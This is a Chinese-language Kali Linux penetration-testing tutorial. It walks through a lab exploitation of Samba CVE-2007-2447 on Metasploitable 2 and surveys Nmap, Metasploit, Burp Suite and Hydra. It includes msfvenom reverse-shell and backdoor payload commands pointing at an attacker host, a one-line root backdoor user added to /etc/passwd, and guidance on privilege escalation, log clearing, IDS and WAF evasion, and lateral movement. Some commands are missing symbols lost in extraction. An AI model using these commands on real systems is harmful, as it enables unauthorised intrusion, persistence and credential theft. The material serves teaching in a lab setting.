Kali Linux渗透测试实战:从信息收集到漏洞利用的完整指南
1. 项目概述为什么选择Kali Linux作为你的第一把“瑞士军刀”如果你对网络安全、渗透测试或者“黑客技术”产生了兴趣那么Kali Linux这个名字你肯定不陌生。它就像这个领域的“瑞士军刀”集成了数百种安全工具开箱即用。但很多新手面对它时往往会陷入两个极端要么被它强大的光环吓退觉得无从下手要么兴奋地装上后对着满屏的命令行工具一脸茫然不知道从何学起。我接触Kali Linux已经超过十年从早期的BackTrack用到现在。今天这篇文章我就想从一个实战者的角度帮你把“从入门到实战”这条路走通。我们不会空谈理论而是聚焦于核心操作——那些你真正在渗透测试项目中会反复用到的、决定成败的关键步骤。无论是信息收集、漏洞扫描还是利用漏洞获取权限我都会结合一个完整的实战案例比如针对一个存在已知漏洞的Samba服务把每一步的原理、命令、可能遇到的坑以及我的个人经验掰开揉碎了讲给你听。这篇文章的目标读者是那些已经对Linux有基本了解知道怎么用命令行、编辑文件并且对网络安全有浓厚兴趣的初学者和有一定基础的爱好者。我会假设你已经在虚拟机里装好了Kali如果还没装网上教程很多用VMware或VirtualBox都很简单我们的旅程将从开机后的第一个命令开始。2. 渗透测试的核心流程与Kali的定位在动手之前我们必须先建立正确的“世界观”。渗透测试不是漫无目的地乱试工具它是一套有严格方法论指导的工程活动。理解这个流程你才能明白Kali中每个工具该在什么时候、为什么被使用。2.1 标准渗透测试生命周期一个完整的渗透测试通常遵循PTES渗透测试执行标准或类似框架主要包括以下五个阶段前期交互与情报收集这个阶段主要解决“目标是什么”和“如何合法地测试”。需要与客户明确测试范围、规则哪些系统能测哪些不能、时间窗口等。对于自学练习这一步就是明确你的“靶机”目标比如一个你搭建的漏洞实验环境。信息收集这是所有后续工作的基石。目标是尽可能多地收集关于目标的信息包括但不限于IP地址段、域名、子域名、开放的端口、运行的服务及其版本、操作系统类型、网站架构、员工邮箱、社交媒体信息等。信息收集的深度和广度直接决定了你能发现多少攻击面。Kali中的nmap,theHarvester,recon-ng,sublist3r等工具大显身手。威胁建模与漏洞分析基于收集到的信息分析哪些系统、服务可能存在弱点。然后使用自动化扫描器如Nessus,OpenVAS或手动工具如nmap脚本进行漏洞扫描。关键点在于自动化扫描报告只是参考误报和漏报很多需要人工验证和分析。比如扫描报告说某个Samba服务有漏洞你需要去查CVE详情确认影响版本和利用条件。漏洞利用确认漏洞存在且可利用后尝试利用漏洞突破边界获取系统权限或敏感数据。这是最“炫技”但也最需要谨慎的阶段。Kali的Metasploit Framework是这个阶段的王牌它集成了数千个漏洞利用模块。但我要强调不要过度依赖Metasploit理解漏洞原理、能手动编写或调整利用代码才是高阶能力。后渗透与报告编写获得初始访问权限比如一个webshell或一个低权限shell远不是结束。接下来要进行权限提升、横向移动、持久化驻留、清理痕迹等操作并最终整理所有发现、利用过程、风险等级和建议措施形成专业的报告。Kali Linux的价值在于它为这个流程的每一个阶段尤其是2、3、4阶段提供了几乎全套的工具链。但工具是死的人是活的。你的思路和方法论才是驱动这些工具发挥价值的关键。2.2 Kali Linux在流程中的角色与工具选型逻辑很多人把Kali当成一个“黑客系统”这其实很片面。我更愿意把它看作一个“安全研究人员和渗透测试工程师的工作台”。它的设计哲学是提供一个统一、稳定、工具完备的Linux发行版让你不用在环境配置上浪费时间。当你进行信息收集时你会打开终端根据目标类型选择工具。对Web应用你可能用dirb或gobuster做目录爆破用nikto做Web服务器扫描对网络主机nmap及其脚本引擎nse是你的首选。选型的逻辑基于目标特征是内网IP还是公网域名是HTTP服务还是数据库服务进入漏洞利用阶段Metasploitmsfconsole是绕不开的。但它的正确打开方式不是一上来就search、use、exploit。你应该先用手动方式验证漏洞理解其触发机制然后再用Metasploit进行标准化利用或生成payload。例如对于一个SQL注入点先用sqlmap进行自动化检测和利用了解注入类型和可获取的数据这比直接用一个Metasploit的Web模块更锻炼能力。我的经验是把Kali菜单里的工具按测试阶段分类整理成自己的“武器库”笔记。知道什么场景下该优先用什么工具并且了解其主要参数这比死记硬背几百个工具命令要高效得多。3. 从零开始一次完整的Samba漏洞渗透实战解析理论说再多不如动手做一遍。下面我将带你完整复现一次针对老旧Samba服务CVE-2007-2447的渗透测试。这个漏洞经典且易于理解非常适合新手入门实战。我们的环境是Kali Linux作为攻击机Metasploitable 2一个故意包含漏洞的Linux靶机作为目标。3.1 实验环境搭建与网络配置为什么用虚拟机环境在真实网络中未经授权进行测试是违法的。虚拟机环境让我们可以在完全隔离、合法的沙箱中学习技术。Metasploitable 2是一个经典的漏洞靶场包含了多种过时且有漏洞的服务。操作步骤准备阶段确保你的电脑上安装了VMware Workstation或VirtualBox。分别下载Kali Linux和Metasploitable 2的虚拟机镜像.ova或.vmdk格式。导入与网络设置将两台虚拟机都导入到你的虚拟化软件中。关键设置将两台虚拟机的网络适配器模式都设置为“NAT模式”或“仅主机模式”。我推荐使用“仅主机模式”它会创建一个完全封闭的虚拟网络只有这两台虚拟机之间可以通信与你的宿主机和外部互联网隔离最安全。启动两台虚拟机。获取IP地址在Kali终端中输入ip addr show或ifconfig需安装net-tools查看自己的IP地址通常是192.168.xx.xx段。在Metasploitable 2中登录用户名/密码msfadmin/msfadmin同样用ifconfig查看IP。测试连通性在Kali终端中使用ping 靶机IP命令。看到连续的回复reply即表示网络通畅。注意如果ping不通请检查1) 防火墙是否关闭初学建议都关闭2) 两台虚拟机是否在同一网段即IP地址前三位相同3) 虚拟网络编辑器设置是否正确。3.2 信息收集用Nmap进行端口与服务发现信息收集是渗透测试的“眼睛”。我们的第一个目标就是搞清楚靶机上到底开了哪些“门”端口门后是什么“房间”服务。为什么用NmapNmap是网络发现和安全审计的“事实标准”。它不仅能扫描端口还能识别服务版本、操作系统甚至通过脚本NSE进行漏洞检测。实操命令与解析在Kali终端中我们使用一个较为全面的扫描命令nmap -sV -sC -O -p- 靶机IP -oN scan_result.txt-sV探测服务版本。这是至关重要的一步知道服务的确切版本号如Samba 3.0.20才能精准查找漏洞。-sC使用默认的Nmap脚本进行扫描。这些脚本能进行更深入的探测比如检查是否存在常见漏洞。-O进行操作系统指纹识别。-p-扫描所有65535个端口。默认只扫1000个常用端口但很多服务会开在非常用端口上。靶机IP替换为你的Metasploitable 2的实际IP地址。-oN scan_result.txt将扫描结果以标准格式输出到文件方便后续分析。扫描需要几分钟时间。完成后用cat scan_result.txt或less scan_result.txt查看结果。结果分析要点你会看到类似下面的输出节选PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7你的眼睛应该立刻锁定在139/tcp和445/tcp端口它们运行着Samba smbd 3.X。版本信息显示为“3.X”不够精确但结合Metasploitable 2的已知信息我们可以推测它是存在漏洞的旧版本如3.0.20。我的心得不要只看端口状态是open就完事。仔细阅读VERSION列和可能由-sC脚本输出的额外信息。这些细节是漏洞利用的“敲门砖”。对于重要服务可以针对性地进行更深度扫描例如nmap --script smb-vuln* -p 139,445 靶机IP直接使用Nmap的SMB漏洞检测脚本。3.3 漏洞分析与确认定位CVE-2007-2447拿到“Samba 3.X”这个信息后我们需要进行漏洞匹配。搜索与确认流程关键词搜索在互联网或漏洞库如Exploit-DB CVE官网中搜索“Samba 3.0.20 vulnerability”或“Samba usermap script”。找到漏洞很快你会定位到CVE-2007-2447也被称为Samba “username map script”命令注入漏洞。理解漏洞该漏洞影响Samba 3.0.0至3.0.25rc3版本。当Samba服务器配置中启用了非默认的username map script选项时Metasploitable2默认启用攻击者可以在用户名字段中注入恶意命令如/nohup 这些命令会被服务器以root权限执行。验证影响虽然Nmap扫描没有给出精确版本但Metasploitable2作为知名靶机其Samba版本正在此漏洞影响范围内。我们可以高度确信该漏洞存在。重要原则在真实环境中绝不能仅凭版本号范围就断定漏洞存在。必须进行无害验证Proof of Concept例如尝试触发一个不造成实际损害的payload如执行id或whoami命令回显或者利用该漏洞读取一个无关紧要的系统文件。但在本次学习环境中我们可以直接进入利用阶段。3.4 漏洞利用使用Metasploit框架发起攻击Metasploit框架MSF将漏洞利用过程模块化、标准化极大地提高了效率。步骤详解启动Metasploit# 首先确保PostgreSQL数据库运行MSF用它存储数据 sudo systemctl start postgresql # 初始化数据库通常安装时已做但执行无害 sudo msfdb init # 启动MSF控制台 msfconsole启动msfconsole可能需要一点时间。成功后提示符会变为msf6 。搜索并选择攻击模块msf6 search cve:2007-2447 # 或者 search samba usermap你会看到名为exploit/multi/samba/usermap_script的模块。使用它msf6 use exploit/multi/samba/usermap_script配置模块参数这是核心步骤参数错了就无法成功。# 查看需要设置哪些参数 msf6 exploit(multi/samba/usermap_script) show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port (TCP) Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen portRHOST目标地址Remote HOST设为靶机IP。RPORT目标端口。Samba服务通常监听139和445端口。我们扫描显示两个都开放这里用445端口更常用。LHOST监听地址Local HOST设为Kali攻击机的IP。这是新手最容易出错的地方必须设为攻击机在虚拟网络中的IP不是127.0.0.1。LPORT监听端口可保持默认4444只要不冲突即可。开始设置msf6 exploit(multi/samba/usermap_script) set RHOST 192.168.xx.xx # 替换为靶机IP msf6 exploit(multi/samba/usermap_script) set RPORT 445 msf6 exploit(multi/samba/usermap_script) set LHOST 192.168.yy.yy # 替换为Kali IP再次show options确认所有参数是否正确。选择PayloadPayload是成功利用漏洞后我们想让目标系统执行的代码比如反弹一个shell回来。# 查看可用的payload msf6 exploit(multi/samba/usermap_script) show payloads # 我们选择最常见的反向Shell它会让靶机主动连接到我们的攻击机 msf6 exploit(multi/samba/usermap_script) set payload cmd/unix/reverse发起攻击msf6 exploit(multi/samba/usermap_script) exploit如果一切配置正确你会看到[*] Started reverse TCP handler on 192.168.yy.yy:4444然后很快出现[*] Command shell session 1 opened的提示。你的命令行提示符会变成一个普通的$或#这表示你已经获得了靶机的一个命令行会话Shell验证权限在得到的Shell中输入一些命令验证whoami # 查看当前用户很可能是root id # 查看用户ID和组信息 pwd # 查看当前目录 hostname # 查看主机名确认是靶机成功的关键点确保RHOST和LHOST设置正确并且两台虚拟机网络互通。如果exploit后长时间没反应或报错首先用ping命令检查网络然后检查靶机的Samba服务是否真的在运行netstat -tulnp | grep 445最后再仔细核对MSF模块的所有参数。3.5 后渗透初窥权限维持与信息收集拿到Shell而且是root权限并不是终点这只是一个开始。在真实的渗透测试中你需要思考下一步做什么。基础信息收集 在靶机的Shell中你可以执行命令来收集更多信息uname -a # 查看系统内核详细信息 cat /etc/passwd # 查看系统所有用户注意这里只是展示真实环境中要谨慎 cat /etc/issue 或 cat /etc/*release # 查看系统发行版信息 ifconfig 或 ip addr # 查看靶机网络配置或许有多个网卡 netstat -tulnp 或 ss -tulnp # 查看靶机内部开放的其他端口这些信息可以帮助你了解目标系统的环境为可能的横向移动攻击同一网络内的其他机器做准备。权限维持的简单思路 真实的攻击者不会满足于一个一次性的Shell。他们会尝试留下后门以便随时回来。一个最简单的方法是添加一个具有root权限的后门用户。# 在靶机上执行注意这会在靶机上留下明显痕迹仅用于学习理解 echo backdoor:$(openssl passwd -1 -salt xyz 123456):0:0:root:/root:/bin/bash /etc/passwd这条命令创建了一个用户名为backdoor密码为123456且UID和GID都为0即root权限的用户。之后攻击者就可以通过SSH如果开放或其它方式用这个账号登录。重要警告上述添加后门用户的方法非常原始会在/etc/passwd文件中留下明显异常行容易被管理员发现。在实际的渗透测试或CTF比赛中有更多隐蔽的方法如创建SUID权限的二进制文件、安装Rootkit、写入定时任务crontab或系统服务等。在未经授权的系统上做这些是严重的违法行为。清理痕迹可选对于学习环境我们可以不清理。但在真实测试中根据规则可能需要清理访问日志如/var/log/auth.log,/var/log/samba/log.*等。这同样需要谨慎操作。4. 核心工具链深度解析与使用技巧通过上面的实战我们接触了Nmap和Metasploit。但Kali的工具箱远不止这些。下面我挑几个最核心、最常用的工具分享一些超越官方文档的实战技巧。4.1 Nmap不只是端口扫描器Nmap的强大在于其脚本引擎NSE。-sC参数只是运行默认脚本我们可以更有针对性。服务漏洞探测例如针对SMB服务有专门的漏洞检测脚本。nmap --script smb-vuln-ms17-010 -p 445 靶机IP # 检测永恒之蓝漏洞 nmap --script smb-vuln* -p 139,445 靶机IP # 运行所有smb漏洞检测脚本隐蔽扫描-sSSYN半开放扫描、-sTTCP全连接扫描、-sN/-sF/-sX隐蔽扫描。在需要规避IDS/IPS时可以尝试-T调整时序模板0-5数字越大越快越吵。输出格式-oN标准、-oXXML适合导入其他工具、-oGGrepable便于用命令行处理。我习惯用-oA basename一次性输出所有三种格式。我的经验对于大型网络扫描先用-snPing扫描快速发现存活主机再对存活主机进行详细的端口和服务扫描能节省大量时间。另外将常用的复杂扫描命令写成脚本或别名alias能极大提升效率。4.2 Metasploit超越图形化界面的力量很多人喜欢用armitageMSF的图形界面但我强烈建议从msfconsole命令行学起这让你更清楚底层发生了什么。工作区管理使用workspace命令管理不同项目。workspace -a ProjectA创建workspace ProjectA切换。这样数据库里的主机、服务、漏洞数据就不会混在一起。数据库集成将Nmap扫描结果直接导入MSF数据库实现信息关联。# 首先在msfconsole中启动数据库连接 db_status # 如果未连接运行 db_connect通常已自动连接 # 将之前保存的XML格式扫描结果导入 db_import /path/to/your/nmap_scan.xml # 查看导入的主机和服务 hosts services手动生成Payloadmsfvenom是MSF中独立于console的payload生成器功能极其强大。# 生成一个Linux下的反向Shell可执行文件 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST192.168.yy.yy LPORT4444 -f elf -o shell.elf # 生成一个Windows下的exe后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.yy.yy LPORT4444 -f exe -o backdoor.exe # 生成一个PHP的Web Shell msfvenom -p php/meterpreter/reverse_tcp LHOST192.168.yy.yy LPORT4444 -f raw -o shell.php生成payload后你需要将其上传到目标机器并执行同时在MSF中启动对应的监听器use exploit/multi/handler; set payload ...; set LHOST ...; exploit。4.3 Burp SuiteWeb应用测试的“神兵利器”对于Web渗透测试Burp Suite是绝对的核心。它是个代理能拦截、查看、修改浏览器和服务器之间的所有HTTP/HTTPS流量。核心模块使用Proxy设置浏览器代理如127.0.0.1:8080拦截流量。可以修改请求参数进行重放攻击测试SQL注入、XSS等。Repeater将拦截的请求发送到Repeater可以手动修改任何部分参数、头、方法并反复发送观察响应变化是手动测试漏洞的利器。Intruder用于自动化攻击如爆破密码对登录接口、模糊测试对参数、枚举标识符如用户ID。Scanner自动化的Web漏洞扫描器社区版功能有限。实战技巧配置HTTPS证书为了拦截HTTPS流量需要在浏览器中安装Burp Suite生成的CA证书在Proxy - Options - Import/export CA certificate导出然后导入到浏览器受信任的根证书颁发机构。使用范围Scope在Target - Scope中设置目标范围这样Burp会只处理你关心的流量避免被无关请求干扰。结合浏览器插件如FoxyProxy方便切换代理HackBar方便快速构造Payload。4.4 Hydra与Medusa网络服务密码爆破当发现一个开放的登录服务如SSH, FTP, Telnet, HTTP表单登录而你又没有密码时可以尝试爆破。Hydra示例爆破SSHhydra -l username -P /usr/share/wordlists/rockyou.txt ssh://靶机IP-l指定单个用户名。-L指定一个用户名字典文件。-p指定单个密码。-P指定一个密码字典文件。rockyou.txt是Kali自带的一个著名弱口令字典。-t指定线程数默认16线程太多可能被目标封IP。-vV显示详细过程。注意事项合法性仅对你有授权测试的系统进行。隐蔽性爆破会产生大量失败登录日志极易触发警报。在真实测试中需谨慎或与客户约定测试时间。字典质量爆破成功率极大依赖于字典。可以根据目标行业、公司、人员信息定制字典使用cewl等工具从目标网站生成关键词字典。5. 实战中常见问题与排查思路实录即使按照教程一步步做你也一定会遇到各种问题。下面是我总结的一些典型问题及其解决思路。5.1 网络连通性问题这是新手遇到最多的问题表现为ping不通、扫描无结果、MSF连接超时。症状ping 靶机IP无响应或显示“Destination Host Unreachable”。排查步骤检查虚拟机网络设置确保攻击机和靶机在同一网络模式NAT或仅主机模式。如果是“仅主机模式”需在虚拟网络编辑器中查看对应的虚拟网卡如VMnet1的网段并手动将两台虚拟机的IP设置在同一网段。检查防火墙在Kali和靶机上临时关闭防火墙测试。Kali:sudo ufw disable或sudo systemctl stop iptables。靶机Metasploitable2默认防火墙规则较少但也可检查。检查IP地址用ip addr或ifconfig确认两台机器的IP地址是否在同一子网如192.168.1.x/24。如果靶机是DHCP获取的而Kali是手动设置的可能不在同一网段。检查路由在Kali上执行route -n查看默认网关。如果网络模式复杂可能需要添加静态路由。5.2 Metasploit漏洞利用失败症状exploit命令执行后显示[*] Started handler...但一直没返回session或者直接报错[-] Exploit failed。排查思路参数检查RHOST和LHOST是否设反了LHOST必须设为Kali在靶机看来能访问到的IP。在NAT网络下有时需要设为Kali的虚拟网卡IP而不是本地回环地址。Payload兼容性检查选择的payload是否与目标系统架构兼容。例如对32位Linux系统使用linux/x64/的payload会失败。尝试使用更通用的payload如cmd/unix/reverse或generic/shell_reverse_tcp。端口与服务状态确认目标服务的端口确实开放且正在运行。用netstat -tulnp在靶机上确认或者用nmap -sV -p 端口 靶机IP在Kali上再次扫描。杀毒软件/入侵防御系统在真实Windows目标上payload可能被防病毒软件拦截。需要使用编码器msfvenom的-e参数或加密技术进行免杀处理但这属于进阶内容。查看详细错误在MSF中执行set verbose true后再运行exploit会输出更详细的错误信息有助于定位问题。5.3 权限提升失败症状拿到了一个Shell但只是普通用户如www-data,apache无法读取敏感文件或进行系统级操作。思路与方法信息收集首先运行sudo -l查看当前用户能以root身份无需密码运行哪些命令。如果某个命令如vim,find,python可以以root运行通常可以利用它提权。内核漏洞运行uname -a查看内核版本搜索该版本是否存在公开的本地提权LPE漏洞。使用searchsploit linux kernel 版本号在Kali中查找。找到后下载exp代码传到靶机编译执行。风险提示内核exp可能导致系统崩溃。SUID/GUID文件运行find / -perm -us -type f 2/dev/null查找设置了SUID位的文件。如果某些本不应具有SUID位的文件如bash,cp,nmap旧版本拥有该权限可能存在提权方法。计划任务检查/etc/crontab和/var/spool/cron/crontabs/下的计划任务看是否有以root权限运行且用户可写的脚本可以通过篡改脚本内容获取root权限。密码与哈希尝试在靶机文件系统中寻找密码或密码哈希如/etc/shadow的备份、Web应用的配置文件、数据库连接字符串等拿到后可以用john或hashcat进行破解。5.4 工具运行报错或找不到症状命令未找到command not found或运行时依赖库缺失。解决方案更新系统Kali是滚动发行版定期运行sudo apt update sudo apt full-upgrade -y更新所有工具和系统。安装缺失工具使用apt search 工具名查找然后用sudo apt install 工具名安装。手动安装有些新工具或脚本不在官方源中需要从GitHub克隆。例如git clone https://github.com/xxx/xxx.git然后按照其README.md文件进行安装通常需要cd到目录运行chmod x给脚本执行权限或pip install -r requirements.txt安装Python依赖。处理依赖问题如果遇到类似“libxxx.so.x not found”的错误说明缺少动态链接库。使用apt-file search libxxx.so.x查找是哪个软件包提供的然后安装该软件包。6. 从实验室到更真实的场景思路拓展掌握了基础流程和工具后你需要知道如何应对更复杂、更接近真实的环境。6.1 面对现代防御措施真实网络往往有防火墙、WAF、IDS/IPS。你的扫描和攻击流量可能被直接阻断。端口扫描对抗使用Nmap的-f分片、--mtu指定MTU、--scan-delay设置延迟、--source-port伪造源端口等参数尝试绕过简单的IDS规则。使用-sSSYN扫描比-sT全连接扫描更隐蔽。Web应用防火墙对于SQL注入尝试使用编码、注释符混淆如/**/、参数污染等技术绕过WAF规则。工具如sqlmap有--tamper参数可以调用混淆脚本。流量加密与隧道使用加密通道如SSH隧道、DNS隧道、HTTPS代理来隐藏你的C2命令与控制流量。Metasploit的payload支持多种传输方式如reverse_https。6.2 内网穿透与横向移动在攻陷一台边界服务器跳板机后真正的战斗往往在内网。信息收集在跳板机上收集内网信息ip addr/ifconfig看网卡arp -a或cat /proc/net/arp看ARP表netstat -antp看网络连接cat /etc/resolv.conf看DNS服务器cat /etc/hosts看主机映射。代理与转发使用msf的socks4a/socks5代理模块或者EarthWorm,reGeorg等工具将你的攻击流量通过跳板机代理到内网。密码重用与哈希传递在内网中域环境下的密码重用现象很普遍。获取一台机器的本地密码哈希后可以尝试用psexec,wmiexec等工具进行哈希传递攻击横向移动到其他使用相同密码的机器。6.3 编写简单的自动化脚本当你反复执行一系列固定操作时就应该考虑写成脚本。Bash脚本将信息收集命令写成脚本。例如一个简单的主机发现和快速扫描脚本#!/bin/bash # auto_scan.sh TARGET$1 echo [*] Scanning $TARGET ... nmap -sn $TARGET/24 -oG alive_hosts.gnmap grep Status: Up alive_hosts.gnmap | cut -d -f2 targets.txt echo [*] Found $(cat targets.txt | wc -l) alive hosts. for ip in $(cat targets.txt); do echo [*] Quick scan on $ip nmap -sV -O -T4 $ip -oN scan_$ip.txt done wait echo [*] All scans completed.Python与Metasploit RPCMetasploit提供了RPC接口允许你用Python、Ruby等语言编写脚本自动化调用MSF功能。这可以实现高度定制化的自动化攻击流程。学习Kali Linux和渗透测试是一个螺旋上升的过程。从跟着教程复现漏洞开始到理解工具原理再到能根据实际情况组合使用工具最后能自己编写工具或修改利用代码。这条路没有捷径唯有多动手、多思考、多总结。每一次失败和排错都是宝贵的经验。希望这篇长文能成为你踏上这条道路的一块坚实垫脚石。记住能力越大责任越大永远在法律和道德的框架内使用你的技能。

相关新闻

解决企业微信会话存档RSA私钥解密报错:malformed sequence排查指南

解决企业微信会话存档RSA私钥解密报错:malformed sequence排查指南

1. 项目概述与问题定位最近在对接企业微信的会话内容存档功能时,遇到了一个挺典型的坑。项目用的是SKIT.FlurlHttpClient.Wechat这个优秀的 .NET SDK 来简化开发。流程本身不复杂:先从企业微信服务器拉取加密的聊天记录,然后本地用 RSA 私钥解…

2026/7/3 19:43:04 阅读更多 →
中国AI的工业数据闭环:从算力竞赛到物理世界锚定

中国AI的工业数据闭环:从算力竞赛到物理世界锚定

1. 这不是预测,是拆解一场正在发生的系统性位移你刷到过多少次“中美AI差距”的标题?点进去不是情绪化站队,就是堆砌参数的PPT式复读。但真正做模型训练、跑过千卡集群、在产线部署过推理服务的人,根本不会用“追不追得上”这种小…

2026/7/3 19:41:02 阅读更多 →
3步解锁专业文档排版:Liberation Fonts完全指南 [特殊字符]

3步解锁专业文档排版:Liberation Fonts完全指南 [特殊字符]

3步解锁专业文档排版:Liberation Fonts完全指南 🎯 【免费下载链接】liberation-fonts The Liberation(tm) Fonts is a font family which aims at metric compatibility with Arial, Times New Roman, and Courier New. 项目地址: https://gitcode.c…

2026/7/3 19:41:02 阅读更多 →

最新新闻

如何彻底解决Windows 10/11中PL2303老芯片的驱动兼容性问题

如何彻底解决Windows 10/11中PL2303老芯片的驱动兼容性问题

如何彻底解决Windows 10/11中PL2303老芯片的驱动兼容性问题 【免费下载链接】pl2303-win10 Windows 10 driver for end-of-life PL-2303 chipsets. 项目地址: https://gitcode.com/gh_mirrors/pl/pl2303-win10 如果你在Windows 10或Windows 11系统中使用PL-2303 USB转串…

2026/7/3 20:43:22 阅读更多 →
Spring Boot集成Cassandra:高性能数据存储实战指南

Spring Boot集成Cassandra:高性能数据存储实战指南

1. 为什么选择 Cassandra 作为 Spring Boot 的数据存储方案在分布式系统架构设计中,数据库选型往往直接决定了系统的扩展上限。三年前我在处理一个物联网平台项目时,曾面临日均千万级设备状态写入的挑战。当时测试了多种数据库方案,最终 Cass…

2026/7/3 20:43:22 阅读更多 →
Magpie窗口超分辨率工具:3步实现游戏画面高清重制

Magpie窗口超分辨率工具:3步实现游戏画面高清重制

Magpie窗口超分辨率工具:3步实现游戏画面高清重制 【免费下载链接】Magpie A general-purpose window upscaler for Windows 10/11. 项目地址: https://gitcode.com/gh_mirrors/mag/Magpie 还在为老旧游戏在4K显示器上模糊不堪而烦恼吗?Windows平…

2026/7/3 20:41:21 阅读更多 →
如何免费永久使用IDM:开源激活脚本的完整解决方案

如何免费永久使用IDM:开源激活脚本的完整解决方案

如何免费永久使用IDM:开源激活脚本的完整解决方案 【免费下载链接】IDM-Activation-Script IDM Activation & Trail Reset Script 项目地址: https://gitcode.com/gh_mirrors/id/IDM-Activation-Script 你是否厌倦了Internet Download Manager&#xff0…

2026/7/3 20:39:20 阅读更多 →
深度解析N_m3u8DL-RE:跨平台流媒体下载器的3种核心架构实现原理

深度解析N_m3u8DL-RE:跨平台流媒体下载器的3种核心架构实现原理

深度解析N_m3u8DL-RE:跨平台流媒体下载器的3种核心架构实现原理 【免费下载链接】N_m3u8DL-RE Cross-Platform, modern and powerful stream downloader for MPD/M3U8/ISM. English/简体中文/繁體中文. 项目地址: https://gitcode.com/GitHub_Trending/nm3/N_m3u…

2026/7/3 20:37:20 阅读更多 →
如何实现自然语言到SQL的智能转换:Vanna AI企业级解决方案深度解析

如何实现自然语言到SQL的智能转换:Vanna AI企业级解决方案深度解析

如何实现自然语言到SQL的智能转换:Vanna AI企业级解决方案深度解析 【免费下载链接】vanna 🤖 Chat with your SQL database 📊. Accurate Text-to-SQL Generation via LLMs using Agentic Retrieval 🔄. 项目地址: https://git…

2026/7/3 20:37:20 阅读更多 →

日新闻

Nginx防御TLS重协商攻击实战:从原理到配置与监控

Nginx防御TLS重协商攻击实战:从原理到配置与监控

1. 项目概述:为什么TLS重协商攻击至今仍需警惕十多年前的CVE-2011-1473,一个关于TLS/SSL协议重协商机制的漏洞,现在提起来还有必要吗?很多运维和开发朋友可能会觉得,这都老掉牙了,现代服务器和客户端不都默…

2026/7/3 0:03:59 阅读更多 →
华为防火墙双通道远程管理实战:Web与SSH配置详解

华为防火墙双通道远程管理实战:Web与SSH配置详解

1. 项目概述:为什么需要双通道远程管理防火墙?在任何一个稍具规模的企业网络里,防火墙都是那个默默守护在边界的关键角色。作为网络工程师,我们不可能每次都跑到机房,插上console线去配置它。远程管理能力,…

2026/7/3 0:03:59 阅读更多 →
AD74413R与PIC18F65K40的高精度工业数据采集方案

AD74413R与PIC18F65K40的高精度工业数据采集方案

1. 项目概述:AD74413R与PIC18F65K40的协同工作在工业自动化和精密测量领域,同时实现高精度模数转换(ADC)和数模转换(DAC)功能是许多复杂系统的核心需求。AD74413R作为一款四通道可配置模拟输入/输出器件,与PIC18F65K40微控制器的组合&#xf…

2026/7/3 0:05:59 阅读更多 →

周新闻

月新闻